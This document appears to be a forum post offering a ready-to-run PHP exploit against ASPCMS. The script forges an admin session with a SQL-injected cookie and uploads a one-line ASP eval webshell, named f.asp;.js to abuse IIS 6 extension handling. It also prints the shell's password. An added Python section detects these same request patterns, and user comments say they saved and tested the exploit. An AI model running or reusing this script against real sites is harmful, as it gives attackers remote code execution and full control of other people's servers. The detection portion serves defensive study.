ASPCMS: bypassing admin authentication to obtain a webshell [for versions whose cookie check can be bypassed]
<?php
// Exploit script as posted; English comments and minor robustness fixes added by the editor.
print_r('
+---------------------------------------------------------------------------+
ASPCMS绕过后台验证拿webshell
说明:/templates/cn/html/f.asp;.js 密码123
+---------------------------------------------------------------------------+
');
// Usage banner: first argument is the host, optional second argument is the admin directory.
if ($argc < 2) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url path
Example:
php '.$argv[0].' localhost
php '.$argv[0].' localhost /admin%5Faspcms/
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7);               // E_ERROR | E_WARNING | E_PARSE
ini_set('max_execution_time', 0);
$url  = $argv[1];
$path = isset($argv[2]) ? $argv[2] : '/admin%5Faspcms/';   // default admin directory admin_aspcms
$path = rtrim($path, '/') . '/_style/AspCms_TemplateAdd.asp?acttype=html&action=add';
$ret  = exploit($url, $path);
// The template editor answers "添加成功" ("added successfully") once the file has been written.
// The match assumes the response uses the same character encoding as this script file.
$scan = "添加成功";
if (strpos($ret, $scan) !== false) {
    echo "WEBSHELL已拿到\r\n";
    echo "http://$url/templates/cn/html/f.asp;.js\r\n";
} else {
    echo "Failed: success marker not found in response\r\n";
}
exit;

function exploit($host, $path)
{
    // URL-encoded form body: the template file name and its content.
    $pmsg = "filename=f.asp%3B.js&filetext=%3C%25eval+request%28%22123%22%29%25%3E";
    $len  = strlen($pmsg);
    $payload  = "POST $path HTTP/1.1\r\n";
    $payload .= "Host: $host\r\n";
    $payload .= "User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1\r\n";
    $payload .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $payload .= "Accept-Language: en-us,en;q=0.5\r\n";
    $payload .= "Accept-Encoding: deflate\r\n";
    $payload .= "Connection: close\r\n";
    // Cookie values the affected version trusts as proof of an admin login.
    $payload .= "Cookie: adminName=admin;groupMenu=all;adminrand='or+loginname%3d'admin\r\n";
    $payload .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $payload .= "Content-Length: $len\r\n\r\n";
    $payload .= $pmsg;
    $fp = fsockopen($host, 80, $errno, $errstr, 10);
    if (!$fp) {
        echo "Connection failed: $errstr ($errno)\r\n";
        return '';
    }
    fputs($fp, $payload);
    $resp = '';
    while (!feof($fp)) {
        $resp .= fread($fp, 1024);
    }
    fclose($fp);
    return $resp;
}
?>
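The request above depends on two weaknesses that are easy to spot in traffic: the admin cookie adminrand is accepted with SQL metacharacters in it ('or loginname='admin), and the template editor writes a file named f.asp;.js, which IIS 6 runs as ASP while an extension check only sees .js. The following Python is an added detection example, not code from the original post; it inspects constructed request records (method, path, Cookie header, body) for both patterns and for inline <% eval %> in the submitted template text, and the record layout and indicator names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed request records (method, path, Cookie header, POST body); not real traffic.
SAMPLE_REQUESTS = [
    ("POST", "/admin_aspcms/_style/AspCms_TemplateAdd.asp?acttype=html&action=add",
     "adminName=admin;groupMenu=all;adminrand='or+loginname%3d'admin",
     "filename=f.asp%3B.js&filetext=%3C%25eval+request%28%22123%22%29%25%3E"),
    ("POST", "/admin_aspcms/_style/AspCms_TemplateAdd.asp?acttype=html&action=add",
     "adminName=admin;groupMenu=all;adminrand=7f3a9c2e",
     "filename=index.html&filetext=%3Chtml%3E%3C%2Fhtml%3E"),
    ("GET", "/templates/cn/html/index.html", "", ""),
]

TEMPLATE_ADD = re.compile(r"/AspCms_TemplateAdd\.asp", re.I)
# Quote, comment or boolean operator inside a value that should be an opaque token.
SQL_META = re.compile(r"['\"]|--|/\*|\bor\b", re.I)
# IIS 6 executes "x.asp;.js" as ASP while an extension check only sees ".js".
SEMICOLON_EXT = re.compile(r"\.(asp|asa|cer|cdx)\s*;", re.I)
# Server-side code in what should be HTML template text.
ASP_CODE = re.compile(r"<%.*?\b(eval|execute)\b", re.I | re.S)

def parse_cookie(header):
    """Split a Cookie header into a dict, URL-decoding each value."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.split("=", 1)
            cookies[name.strip()] = unquote(value.strip().replace("+", " "))
    return cookies

def inspect(method, path, cookie, body):
    """Return the list of indicators found in one request record."""
    findings = []
    adminrand = parse_cookie(cookie).get("adminrand", "")
    if SQL_META.search(adminrand):
        findings.append("sqli-in-adminrand-cookie")
    if method == "POST" and TEMPLATE_ADD.search(path):
        form = parse_qs(body)          # decodes %XX and '+' in both keys and values
        filename = form.get("filename", [""])[0]
        filetext = form.get("filetext", [""])[0]
        if SEMICOLON_EXT.search(filename):
            findings.append("iis-semicolon-extension-bypass")
        if ASP_CODE.search(filetext):
            findings.append("asp-code-in-template")
    return findings

def scan(records=SAMPLE_REQUESTS):
    # Map each record index to its indicators; an empty list means nothing suspicious.
    return {i: inspect(*rec) for i, rec in enumerate(records)}
```

Any hit on the adminrand check is worth an alert on its own, since a legitimate session token never contains a quote; the other two indicators confirm that the upload path was reached.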
9 comments
Taking it...... thanks...
XDAY~!!!
Too late
Saved~
Hasn't this been around for a long time?
Saved this one~
It was updated a few days ago; the latest version uses session now, it used to use COOKIE
Tested, but you need to know the admin path, not much use.
Saved